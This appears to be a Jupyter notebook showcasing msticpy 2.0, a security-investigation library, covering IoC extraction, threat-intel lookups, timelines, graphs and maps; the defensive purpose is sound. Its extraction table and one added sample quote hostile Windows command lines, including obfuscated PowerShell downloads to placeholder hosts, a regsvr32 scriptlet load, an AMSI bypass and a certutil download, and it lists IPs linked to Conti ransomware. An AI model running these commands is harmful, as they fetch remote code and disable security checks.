New "house style" - shortening msticpy to "mp"
import msticpy as mp
mp.init_notebook()
True
Many classes and functions are available directly from "mp"
qry_prov = mp.QueryProvider("MSSentinel")
ti = mp.TILookup()
mp.check_version()
mp.search("sentinel")
Using Open PageRank. See https://www.domcop.com/openpagerank/what-is-openpagerank
msticpy version installed: 2.0.0rc2 latest published: 1.8.2
Latest version is installed.
Module | Help |
---|---|
msticpy.datamodel.soc.sentinel_alert | msticpy.datamodel.soc.sentinel_alert |
msticpy.context.azure.sentinel_utils | msticpy.context.azure.sentinel_utils |
msticpy.config.ce_azure_sentinel | msticpy.config.ce_azure_sentinel |
msticpy.context.azure.sentinel_incidents | msticpy.context.azure.sentinel_incidents |
msticpy.context.azure.sentinel_watchlists | msticpy.context.azure.sentinel_watchlists |
msticpy.context.azure.sentinel_core | msticpy.context.azure.sentinel_core |
msticpy.context.azure.sentinel_bookmarks | msticpy.context.azure.sentinel_bookmarks |
msticpy.context.azure.sentinel_workspaces | msticpy.context.azure.sentinel_workspaces |
msticpy.context.azure.sentinel_analytics | msticpy.context.azure.sentinel_analytics |
msticpy.context.azure.sentinel_search | msticpy.context.azure.sentinel_search |
init_notebook imports many items into the notebook namespace:
ip = "145.1.10.17"
IpAddress.whois(ip)
asn | asn_cidr | asn_country_code | asn_date | asn_description | asn_registry | nets | nir | query | raw | raw_referral | referral | |
---|---|---|---|---|---|---|---|---|---|---|---|---|
0 | 1103 | 145.1.0.0/17 | NL | 1993-09-01 | SURFNET-NL SURFnet, The Netherlands, NL | ripencc | [{'cidr': '145.1.0.0/17', 'name': 'NIOZ-NET', 'handle': 'WP1948-RIPE', 'range': '145.1.0.0 - 145... | None | 145.1.10.17 | None | None | None |
IpAddress.util.geoloc(ip)
CountryCode | CountryName | Longitude | Latitude | TimeGenerated | Type | IpAddress | |
---|---|---|---|---|---|---|---|
0 | NL | Netherlands | 4.8995 | 52.3824 | 2022-06-14 16:25:09.670081 | geolocation | 145.1.10.17 |
Most dataframe-related functionality is available through the `mp` and `mp_plot` DataFrame accessors (for example `proc_df.mp.ioc_extract` and `proc_df.mp_plot.timeline` below).
`df.mp_timeseries` is a separate accessor since it requires non-core dependencies such as statsmodels.
proc_df = pd.read_csv("data/processes_on_host.csv", index_col=0)
proc_df.head(3)
TenantId | Account | EventID | TimeGenerated | Computer | SubjectUserSid | SubjectUserName | SubjectDomainName | SubjectLogonId | NewProcessId | NewProcessName | TokenElevationType | ProcessId | CommandLine | ParentProcessName | TargetLogonId | SourceComputerId | TimeCreatedUtc | |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
0 | 802d39e1-9d70-404d-832c-2de5e2478eda | WORKGROUP\MSTICAlertsWin1$ | 4688 | 2019-01-15 05:24:24.010 | MSTICAlertsWin1 | S-1-5-18 | MSTICAlertsWin1$ | WORKGROUP | 0x3e7 | 0x1610 | C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\De... | %%1936 | 0x888 | "C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\D... | C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe | 0x0 | 46fe7078-61bb-4bed-9430-7ac01d91c273 | 2019-01-15 05:24:24.010 |
1 | 802d39e1-9d70-404d-832c-2de5e2478eda | WORKGROUP\MSTICAlertsWin1$ | 4688 | 2019-01-15 05:24:24.023 | MSTICAlertsWin1 | S-1-5-18 | MSTICAlertsWin1$ | WORKGROUP | 0x3e7 | 0x1790 | C:\Windows\System32\conhost.exe | %%1936 | 0x1610 | \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\De... | 0x0 | 46fe7078-61bb-4bed-9430-7ac01d91c273 | 2019-01-15 05:24:24.023 |
2 | 802d39e1-9d70-404d-832c-2de5e2478eda | WORKGROUP\MSTICAlertsWin1$ | 4688 | 2019-01-15 05:24:25.807 | MSTICAlertsWin1 | S-1-5-18 | MSTICAlertsWin1$ | WORKGROUP | 0x3e7 | 0xcd8 | C:\Windows\SysWOW64\wbem\WmiPrvSE.exe | %%1936 | 0x280 | C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding | C:\Windows\System32\svchost.exe | 0x3e4 | 46fe7078-61bb-4bed-9430-7ac01d91c273 | 2019-01-15 05:24:25.807 |
proc_df.mp.ioc_extract(columns="CommandLine", ioc_types=["ipv4", "url"])
IoCType | Observable | SourceIndex | Input | |
---|---|---|---|---|
0 | url | http://server/file.sct | 94 | .\regsvr32 /s /n /u /i:http://server/file.sct scrobj.dll |
1 | dns | server | 94 | .\regsvr32 /s /n /u /i:http://server/file.sct scrobj.dll |
2 | url | https://blah/png','google.png')} | 104 | .\powershell -command {(n`EW-obJ`E`cT N`et`.W`eb`C`li`en`t).DownloadFile('https://blah/png','go... |
3 | dns | blah | 104 | .\powershell -command {(n`EW-obJ`E`cT N`et`.W`eb`C`li`en`t).DownloadFile('https://blah/png','go... |
4 | url | http://somedomain/best-kitten-names-1.jpg' | 110 | cmd /c ".\pOWErS^H^ElL^.eX^e^ -^ExEc^Ut^IoNpOliCy BYpa^sS i^mPOr^T-^M^oDuLE biTsTr^ANSFe^R;^S^t... |
5 | dns | somedomain | 110 | cmd /c ".\pOWErS^H^ElL^.eX^e^ -^ExEc^Ut^IoNpOliCy BYpa^sS i^mPOr^T-^M^oDuLE biTsTr^ANSFe^R;^S^t... |
6 | url | http://badguyserver/pwnme | 125 | cmd /c "echo Invoke-Expression Get-Process; Invoke-WebRequest -Uri http://badguyserver/pwnme" |
7 | dns | badguyserver | 125 | cmd /c "echo Invoke-Expression Get-Process; Invoke-WebRequest -Uri http://badguyserver/pwnme" |
8 | url | http://badguyserver/pwnme | 130 | .\powershell -Noninteractive -Noprofile -Command "Invoke-Expression Get-Process; Invoke-WebRequ... |
9 | dns | badguyserver | 130 | .\powershell -Noninteractive -Noprofile -Command "Invoke-Expression Get-Process; Invoke-WebRequ... |
10 | url | http://system.management.automation.amsiutils').getfield('amsiinitfailed','nonpublic,static').se... | 174 | .\powershell.exe -command [ref].assembly.gettype('http://system.management.automation.amsiutil... |
11 | dns | system.management.automation.amsiutils').getfield('amsiinitfailed','nonpublic,static').setvalue(... | 174 | .\powershell.exe -command [ref].assembly.gettype('http://system.management.automation.amsiutil... |
12 | ipv4 | 1.2.3.4 | 175 | netsh start capture=yes IPv4.Address=1.2.3.4 tracefile=C:\\Users\\user\\AppData\\Local\\Temp\\b... |
13 | ipv4 | 127.0.0.1 | 214 | certutil -urlcache -split -f http://127.0.0.1/ |
14 | url | http://127.0.0.1/ | 214 | certutil -urlcache -split -f http://127.0.0.1/ |
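The table above shows a caveat of regex-based extraction: a permissive URL pattern runs on through quotes and brackets, so rows 2, 4 and 10 carry trailing `','google.png')}` style junk. The following added example (not msticpy's own code) reproduces the url/dns/ipv4 extraction over command lines with the standard library and trims that junk before deriving the `dns` observable; the command lines are constructed after the page's rows 104, 175 and 214, with a placeholder trace-file path.

```python
from __future__ import annotations

import re
from urllib.parse import urlparse

# Permissive URL pattern, deliberately greedy like the one whose output is shown
# above: it runs on until whitespace, so quotes and brackets get swallowed.
URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)
IPV4_RE = re.compile(
    r"\b(?:(?:25[0-5]|2[0-4]\d|1?\d?\d)\.){3}(?:25[0-5]|2[0-4]\d|1?\d?\d)\b"
)
TRAILING_JUNK = "'\")}],.;"

# Constructed sample: CommandLine values modelled on the page's table above
# (row indexes 104, 175 and 214); the tracefile path is a placeholder.
SAMPLE_CMDLINES = {
    104: ".\\powershell -command {(n`EW-obJ`E`cT N`et`.W`eb`C`li`en`t)"
         ".DownloadFile('https://blah/png','google.png')}",
    175: "netsh start capture=yes IPv4.Address=1.2.3.4 tracefile=C:\\Temp\\trace.etl",
    214: "certutil -urlcache -split -f http://127.0.0.1/",
}


def clean_url(raw: str) -> str:
    """Cut a swallowed URL at the first quote/bracket and drop trailing punctuation."""
    cut = re.split(r"['\")\]}]", raw, maxsplit=1)[0]
    return cut.rstrip(TRAILING_JUNK)


def extract_iocs(cmdline: str) -> list[tuple[str, str]]:
    """Return (IoCType, Observable) pairs for URLs, their hostnames (dns) and IPv4s."""
    found: list[tuple[str, str]] = []
    for raw in URL_RE.findall(cmdline):
        url = clean_url(raw)
        found.append(("url", url))
        host = urlparse(url).hostname
        # an IP host is reported under ipv4 (below), not as a dns observable
        if host and not IPV4_RE.fullmatch(host):
            found.append(("dns", host))
    for ip in IPV4_RE.findall(cmdline):
        found.append(("ipv4", ip))
    # drop duplicates while keeping first-seen order
    return list(dict.fromkeys(found))


def ioc_table(cmdlines: dict[int, str]) -> list[dict[str, object]]:
    """Rows shaped like ioc_extract's output: IoCType, Observable, SourceIndex, Input."""
    rows: list[dict[str, object]] = []
    for idx, cmd in cmdlines.items():
        for ioc_type, obs in extract_iocs(cmd):
            rows.append({"IoCType": ioc_type, "Observable": obs,
                         "SourceIndex": idx, "Input": cmd})
    return rows


if __name__ == "__main__":
    for row in ioc_table(SAMPLE_CMDLINES):
        print(f"{row['SourceIndex']:>4} {row['IoCType']:<5} {row['Observable']}")
```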
help(proc_df.mp_plot.timeline)
Help on method timeline in module msticpy.vis.mp_pandas_plot:

timeline(**kwargs) -> bokeh.models.layouts.LayoutDOM method of msticpy.vis.mp_pandas_plot.MsticpyPlotAccessor instance
    Display a timeline of events.

    Parameters
    ----------
    time_column : str, optional
        Name of the timestamp column (the default is 'TimeGenerated')
    source_columns : list, optional
        List of default source columns to use in tooltips (the default is None)

    Other Parameters
    ----------------
    title : str, optional
        Title to display (the default is None)
    alert : SecurityAlert, optional
        Add a reference line/label using the alert time (the default is None)
    ref_event : Any, optional
        Add a reference line/label using the alert time (the default is None)
    ref_time : datetime, optional
        Add a reference line/label using `ref_time` (the default is None)
    group_by : str
        The column to group timelines on.
    legend: str, optional
        "left", "right", "inline" or "none" (the default is to show a legend when plotting multiple series and not to show one when plotting a single series)
    yaxis : bool, optional
        Whether to show the yaxis and labels (default is False)
    ygrid : bool, optional
        Whether to show the yaxis grid (default is False)
    xgrid : bool, optional
        Whether to show the xaxis grid (default is True)
    range_tool : bool, optional
        Show the the range slider tool (default is True)
    height : int, optional
        The height of the plot figure (the default is auto-calculated height)
    width : int, optional
        The width of the plot figure (the default is 900)
    color : str
        Default series color (default is "navy")
    overlay_data : pd.DataFrame:
        A second dataframe to plot as a different series.
    overlay_color : str
        Overlay series color (default is "green")
    ref_events : pd.DataFrame, optional
        Add references line/label using the event times in the dataframe. (the default is None)
    ref_time_col : str, optional
        Add references line/label using the this column in `ref_events` for the time value (x-axis). (this defaults the value of the `time_column` parameter or 'TimeGenerated' `time_column` is None)
    ref_col : str, optional
        The column name to use for the label from `ref_events` (the default is None)
    ref_times : List[Tuple[datetime, str]], optional
        Add one or more reference line/label using (the default is None)

    Returns
    -------
    LayoutDOM
        The bokeh plot figure.
proc_df.mp_plot.timeline(group_by="SubjectUserName", source_columns=["CommandLine"])
proc_df.mp_plot.process_tree(legend_col="SubjectUserName")
Previously (minimal code):
from msticpy.nbtools.timeseries import display_timeseries_anomolies
from msticpy.analysis.timeseries import timeseries_anomalies_stl
ts_data = pd.read_csv("data/TimeSeriesDemo.csv", parse_dates=["TimeGenerated"])
ts_data = ts_data[["TimeGenerated", "TotalBytesSent"]]
ts_data = ts_data.set_index("TimeGenerated")
ts_df = timeseries_anomalies_stl(ts_data)
display_timeseries_anomolies(ts_df)
from msticpy.analysis import timeseries
ts_data = pd.read_csv("data/TimeSeriesDemo.csv", parse_dates=["TimeGenerated"])
ts_data.mp_timeseries.analyze(
    time_column="TimeGenerated", data_column="TotalBytesSent"
).mp_timeseries.plot(y="TotalBytesSent")
Previously, when using multiple providers, indicators were sent to each provider in sequence. A large number of indicators made the notebook appear to hang.
In v2.0:
iocs = ['162.244.80.235', '185.141.63.120', '82.118.21.1', '85.93.88.165']
ti_lookup = mp.TILookup()
ti_lookup.lookup_iocs(iocs)
Using Open PageRank. See https://www.domcop.com/openpagerank/what-is-openpagerank
Observables processed: 100%|██████████| 24/24 [00:11<00:00, 2.10obs/s]
Ioc | IocType | SanitizedValue | QuerySubtype | Provider | Result | Severity | Details | RawResult | Reference | Status | |
---|---|---|---|---|---|---|---|---|---|---|---|
0 | 162.244.80.235 | ipv4 | 162.244.80.235 | None | OTX | True | high | {'pulse_count': 45, 'names': ['Conti Ransomware | CISA', 'Conti Ransomware | CISA', 'IOCs for Co... | {'whois': 'http://whois.domaintools.com/162.244.80.235', 'reputation': 0, 'indicator': '162.244.... | https://otx.alienvault.com/api/v1/indicators/IPv4/162.244.80.235/general | 0 |
1 | 185.141.63.120 | ipv4 | 185.141.63.120 | None | OTX | True | high | {'pulse_count': 35, 'names': ['Conti Ransomware | CISA', 'Conti Ransomware | CISA', 'IOCs for Co... | {'whois': 'http://whois.domaintools.com/185.141.63.120', 'reputation': 0, 'indicator': '185.141.... | https://otx.alienvault.com/api/v1/indicators/IPv4/185.141.63.120/general | 0 |
2 | 82.118.21.1 | ipv4 | 82.118.21.1 | None | OTX | True | high | {'pulse_count': 36, 'names': ['Conti Ransomware | CISA', 'Conti Ransomware | CISA', 'IOCs for Co... | {'whois': 'http://whois.domaintools.com/82.118.21.1', 'reputation': 0, 'indicator': '82.118.21.1... | https://otx.alienvault.com/api/v1/indicators/IPv4/82.118.21.1/general | 0 |
3 | 85.93.88.165 | ipv4 | 85.93.88.165 | None | OTX | True | high | {'pulse_count': 22, 'names': ['MS-ISAC: Joint Cybersecurity Advisory: Conti Ransomware', 'Conti ... | {'whois': 'http://whois.domaintools.com/85.93.88.165', 'reputation': 0, 'indicator': '85.93.88.1... | https://otx.alienvault.com/api/v1/indicators/IPv4/85.93.88.165/general | 0 |
0 | 162.244.80.235 | ipv4 | 162.244.80.235 | None | RiskIQ | True | high | {'summary': {'resolutions': 12, 'certificates': 12, 'malware_hashes': 2, 'projects': 0, 'article... | {'summary': {'resolutions': 12, 'certificates': 12, 'malware_hashes': 2, 'projects': 0, 'article... | https://community.riskiq.com | 0 |
1 | 185.141.63.120 | ipv4 | 185.141.63.120 | None | RiskIQ | True | high | {'summary': {'resolutions': 2, 'certificates': 6, 'malware_hashes': 1, 'projects': 0, 'articles'... | {'summary': {'resolutions': 2, 'certificates': 6, 'malware_hashes': 1, 'projects': 0, 'articles'... | https://community.riskiq.com | 0 |
2 | 82.118.21.1 | ipv4 | 82.118.21.1 | None | RiskIQ | True | high | {'summary': {'resolutions': 13, 'certificates': 20, 'malware_hashes': 0, 'projects': 0, 'article... | {'summary': {'resolutions': 13, 'certificates': 20, 'malware_hashes': 0, 'projects': 0, 'article... | https://community.riskiq.com | 0 |
3 | 85.93.88.165 | ipv4 | 85.93.88.165 | None | RiskIQ | True | high | {'summary': {'resolutions': 24, 'certificates': 25, 'malware_hashes': 2, 'projects': 0, 'article... | {'summary': {'resolutions': 24, 'certificates': 25, 'malware_hashes': 2, 'projects': 0, 'article... | https://community.riskiq.com | 0 |
0 | 162.244.80.235 | ipv4 | 162.244.80.235 | None | Tor | True | information | Not found. | None | https://check.torproject.org/exit-addresses | 0 |
1 | 185.141.63.120 | ipv4 | 185.141.63.120 | None | Tor | True | information | Not found. | None | https://check.torproject.org/exit-addresses | 0 |
2 | 82.118.21.1 | ipv4 | 82.118.21.1 | None | Tor | True | information | Not found. | None | https://check.torproject.org/exit-addresses | 0 |
3 | 85.93.88.165 | ipv4 | 85.93.88.165 | None | Tor | True | information | Not found. | None | https://check.torproject.org/exit-addresses | 0 |
0 | 162.244.80.235 | ipv4 | 162.244.80.235 | None | VirusTotal | True | high | {'verbose_msg': 'IP address in dataset', 'response_code': 1, 'positives': 35, 'detected_urls': [... | {'asn': 19624, 'undetected_urls': [], 'undetected_referrer_samples': [{'date': '2022-06-03 16:53... | https://www.virustotal.com/vtapi/v2/ip-address/report | 0 |
1 | 185.141.63.120 | ipv4 | 185.141.63.120 | None | VirusTotal | True | high | {'verbose_msg': 'IP address in dataset', 'response_code': 1, 'positives': 19, 'detected_urls': [... | {'undetected_urls': [], 'undetected_referrer_samples': [{'date': '2022-06-05 03:45:47', 'positiv... | https://www.virustotal.com/vtapi/v2/ip-address/report | 0 |
2 | 82.118.21.1 | ipv4 | 82.118.21.1 | None | VirusTotal | True | high | {'verbose_msg': 'IP address in dataset', 'response_code': 1, 'positives': 42, 'detected_urls': [... | {'asn': 204957, 'undetected_urls': [['http://bkgs0007.nov.com/', 'fe9ad6fcfd8214a3898853b5dec208... | https://www.virustotal.com/vtapi/v2/ip-address/report | 0 |
3 | 85.93.88.165 | ipv4 | 85.93.88.165 | None | VirusTotal | True | high | {'verbose_msg': 'IP address in dataset', 'response_code': 1, 'positives': 7, 'detected_urls': ['... | {'asn': 8972, 'undetected_urls': [['https://bbb.edu-cisco.org/', '6adc598e2c5362b5f5facad921d0f0... | https://www.virustotal.com/vtapi/v2/ip-address/report | 0 |
0 | 162.244.80.235 | ipv4 | 162.244.80.235 | None | XForce | False | information | Authorization failed. Check account and key details. | <Response [401 Unauthorized]> | https://api.xforce.ibmcloud.com/ipr/162.244.80.235 | 401 |
1 | 185.141.63.120 | ipv4 | 185.141.63.120 | None | XForce | False | information | Authorization failed. Check account and key details. | <Response [401 Unauthorized]> | https://api.xforce.ibmcloud.com/ipr/185.141.63.120 | 401 |
2 | 82.118.21.1 | ipv4 | 82.118.21.1 | None | XForce | False | information | Authorization failed. Check account and key details. | <Response [401 Unauthorized]> | https://api.xforce.ibmcloud.com/ipr/82.118.21.1 | 401 |
3 | 85.93.88.165 | ipv4 | 85.93.88.165 | None | XForce | False | information | Authorization failed. Check account and key details. | <Response [401 Unauthorized]> | https://api.xforce.ibmcloud.com/ipr/85.93.88.165 | 401 |
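The lookup above returns one row per (indicator, provider) pair, and a provider that cannot authenticate (the XForce rows with Status 401) still yields a row rather than stopping the whole lookup. The following added example, which is not msticpy's implementation, shows that fan-out pattern with a thread pool and stub providers; the provider classes, the severity ordering and the RFC 5737 sample addresses are all constructed for the example.

```python
from __future__ import annotations

from concurrent.futures import ThreadPoolExecutor, as_completed
from dataclasses import dataclass


@dataclass
class StubProvider:
    """Hypothetical stand-in for a TI provider; no network access."""
    name: str
    verdicts: dict[str, str]        # constructed severity per IoC
    http_status: int = 200

    def lookup(self, ioc: str) -> dict[str, str]:
        if self.http_status == 401:  # mirrors the XForce rows in the table above
            raise PermissionError("Authorization failed. Check account and key details.")
        severity = self.verdicts.get(ioc, "information")
        return {"Severity": severity, "Details": f"{self.name} reports {severity}"}


@dataclass
class Row:
    Ioc: str
    Provider: str
    Result: bool
    Severity: str
    Details: str
    Status: int


def lookup_iocs(iocs: list[str], providers: list[StubProvider], max_workers: int = 8) -> list[Row]:
    """Fan every (ioc, provider) pair out to a thread pool; an auth failure on one
    provider becomes a Result=False row instead of aborting the other lookups."""
    def one(ioc: str, prov: StubProvider) -> Row:
        try:
            res = prov.lookup(ioc)
            return Row(ioc, prov.name, True, res["Severity"], res["Details"], 200)
        except PermissionError as err:
            return Row(ioc, prov.name, False, "information", str(err), 401)

    rows: list[Row] = []
    with ThreadPoolExecutor(max_workers=max_workers) as pool:
        futures = [pool.submit(one, ioc, p) for p in providers for ioc in iocs]
        for fut in as_completed(futures):      # completion order, not submit order
            rows.append(fut.result())
    return sorted(rows, key=lambda r: (r.Provider, r.Ioc))   # stable output


def worst_severity(rows: list[Row]) -> dict[str, str]:
    """Per IoC, the highest severity reported by a provider that actually answered."""
    rank = {"information": 0, "warning": 1, "high": 2}   # assumed ordering
    worst: dict[str, str] = {}
    for r in rows:
        if not r.Result:
            continue   # a 401 tells us nothing about the indicator
        prev = worst.get(r.Ioc, "information")
        worst[r.Ioc] = max(prev, r.Severity, key=rank.__getitem__)
    return worst


# Constructed sample: RFC 5737 documentation addresses and three stub providers.
IOCS = ["192.0.2.10", "198.51.100.7"]
PROVIDERS = [
    StubProvider("OTX", {"192.0.2.10": "high"}),
    StubProvider("VirusTotal", {"192.0.2.10": "high", "198.51.100.7": "high"}),
    StubProvider("XForce", {}, http_status=401),
]
```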
New in v2.0: `proc_df.mp.to_graph` builds on the previous Alert and Incident graph modules, but in a generic form.
nxg = proc_df.mp.to_graph(
    source_col="SubjectUserName",
    target_col="NewProcessName",
    source_attrs=["SubjectDomainName", "SubjectLogonId"],
    target_attrs=["CommandLine", "ParentProcessName"],
    edge_attrs=["TimeGenerated"]
)
import networkx as nx
nx.draw(nxg)
proc_df.mp_plot.network(
    source_col="SubjectUserName",
    target_col="NewProcessName",
    source_attrs=["SubjectDomainName", "SubjectLogonId"],
    target_attrs=["CommandLine", "ParentProcessName"],
    edge_attrs=["TimeGenerated"],
    font_size=7,
)
Previous code
# Create an IP geolocation lookup class
iplocation = GeoLiteLookup()

def format_ip_entity(row, ip_col):
    # Build an IpAddress entity from the row, geolocate it and attach context
    ip_entity = entities.IpAddress(Address=row[ip_col])
    iplocation.lookup_ip(ip_entity=ip_entity)
    ip_entity.AdditionalData["protocol"] = row.L7Protocol
    if "severity" in row:
        ip_entity.AdditionalData["threat severity"] = row["severity"]
    if "Details" in row:
        ip_entity.AdditionalData["threat details"] = row["Details"]
    return ip_entity

ips_out = list(selected_out.apply(lambda x: format_ip_entity(x, "dest"), axis=1))
ips_in = list(selected_in.apply(lambda x: format_ip_entity(x, "source"), axis=1))
ips_threats = list(ti_ip_results.apply(lambda x: format_ip_entity(x, "Ioc"), axis=1))

# One cluster layer per IP category, each with its own marker colour
icon_props = {"color": "green"}
for ips in host_entity.public_ips:
    ips.AdditionalData["host"] = host_entity.HostName
folium_map.add_ip_cluster(ip_entities=host_entity.public_ips, **icon_props)
icon_props = {"color": "blue"}
folium_map.add_ip_cluster(ip_entities=ips_out, **icon_props)
icon_props = {"color": "purple"}
folium_map.add_ip_cluster(ip_entities=ips_in, **icon_props)
icon_props = {"color": "red"}
folium_map.add_ip_cluster(ip_entities=ips_threats, **icon_props)
display(folium_map)
# read in a DataFrame from a csv file
geo_loc_df = (
    pd
    .read_csv("data/ip_locs.csv", index_col=0)
    .dropna(subset=["Latitude", "Longitude", "IpAddress"])  # We need to remove any NaN values
)
display(geo_loc_df.head(5))
AllExtIPs | CountryCode | CountryName | State | City | Longitude | Latitude | Asn | edges | Type | AdditionalData | IpAddress | |
---|---|---|---|---|---|---|---|---|---|---|---|---|
0 | 65.55.44.109 | US | United States | Virginia | Boydton | -78.3750 | 36.6534 | NaN | set() | geolocation | {} | 65.55.44.109 |
1 | 13.71.172.128 | CA | Canada | Ontario | Toronto | -79.4195 | 43.6644 | NaN | set() | geolocation | {} | 13.71.172.128 |
2 | 13.71.172.130 | CA | Canada | Ontario | Toronto | -79.4195 | 43.6644 | NaN | set() | geolocation | {} | 13.71.172.130 |
3 | 40.124.45.19 | US | United States | Texas | San Antonio | -98.4926 | 29.4221 | NaN | set() | geolocation | {} | 40.124.45.19 |
4 | 104.43.212.12 | US | United States | Iowa | Des Moines | -93.6127 | 41.6015 | NaN | set() | geolocation | {} | 104.43.212.12 |
geo_loc_df.mp_plot.folium_map(ip_column="IpAddress")
geo_loc_df.mp_plot.folium_map(
    lat_column="Latitude", long_column="Longitude", zoom_start=10
)
# Create some data to display
data_df = pd.DataFrame({
    "Status": ["Home", "Office", "Vacation"] * (len(geo_loc_df) // 3),
    "Friendliness": ["Warm", "Cold", "Medium"] * (len(geo_loc_df) // 3),
    "Flavor": ["Chocolate", "Cinnamon", "Mango"] * (len(geo_loc_df) // 3),
    "SpiceLevel": [1, 2, 3] * (len(geo_loc_df) // 3)
})
geo_loc_data_df = pd.concat([geo_loc_df, data_df], axis=1).dropna(subset=["IpAddress"])
geo_loc_data_df.head(3)
AllExtIPs | CountryCode | CountryName | State | City | Longitude | Latitude | Asn | edges | Type | AdditionalData | IpAddress | Status | Friendliness | Flavor | SpiceLevel | |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
0 | 65.55.44.109 | US | United States | Virginia | Boydton | -78.3750 | 36.6534 | NaN | set() | geolocation | {} | 65.55.44.109 | Home | Warm | Chocolate | 1.0 |
1 | 13.71.172.128 | CA | Canada | Ontario | Toronto | -79.4195 | 43.6644 | NaN | set() | geolocation | {} | 13.71.172.128 | Office | Cold | Cinnamon | 2.0 |
2 | 13.71.172.130 | CA | Canada | Ontario | Toronto | -79.4195 | 43.6644 | NaN | set() | geolocation | {} | 13.71.172.130 | Vacation | Medium | Mango | 3.0 |
geo_loc_data_df.mp_plot.folium_map(
    ip_column="IpAddress",
    layer_column="CountryName",
    tooltip_columns=["Status", "Flavor"],
    popup_columns=["Friendliness", "SpiceLevel", "Status", "Flavor"],
    zoom_start=2,
)
icon_map = {
    "US": {
        "color": "green",
        "icon": "flash",
    },
    "GB": {
        "color": "purple",
        "icon": "flash",
    },
    "default": {
        "color": "blue",
        "icon": "info-sign",
    },
}
geo_loc_df.mp_plot.folium_map(
    ip_column="AllExtIPs",
    icon_column="CountryCode",
    icon_map=icon_map,
    zoom_start=2,
)
mp.MpConfigEdit()
mp.pivot.browse()
qry_prov = mp.QueryProvider("MSSentinel")
qry_prov2 = mp.QueryProvider("MSSentinel")
qry_prov.connect(workspace="Default")
mp.pivot.browse()
qry_prov.connect(workspace="CyberSecuritySOC")
mp.pivot.browse()
qry_prov.WindowsSecurity.list_host_logons() -> Host.MSSentinel.wevt_logons()
# with UseQueryFamily: True
qry_prov.WindowsSecurity.list_host_logons() -> Host.MSSentinel.WindowsSecurity_logons()
mp.pivot.timespan
....
Pivots:
  UseV1QueryNames: False
  UseQueryFamily: False
  UseQueryProviderTimeSpans: False
folder | description | previously |
---|---|---|
analysis | data analysis functions - timeseries, anomalies, clustering | analysis |
auth | authentication and secrets management | common |
common | commonly used utilities and definitions (e.g. exceptions) | - |
config | configuration and settings | - |
context | enrichment modules (some may need subfolders, e.g. tiproviders, vtlookup) | sectools |
data | data acquisition/queries (most Azure/Sentinel functions moved to context) | - |
datamodel | entities, soc, pivot core functions | - |
init | package loading and initialization - nbinit, pivot creation modules | nbtools, datamodel |
transform | simple data processing - decoding, reformatting, schema change, process tree | sectools |
vis | visualization modules including browsers | nbtools |
nbwidgets | notebook widgets modules | nbtools/nbwidgets |
sectools and nbtools still exist but are mostly redirector modules. E.g.
from msticpy.sectools.geoip import GeoLiteLookup
still works but has a deprecation warning.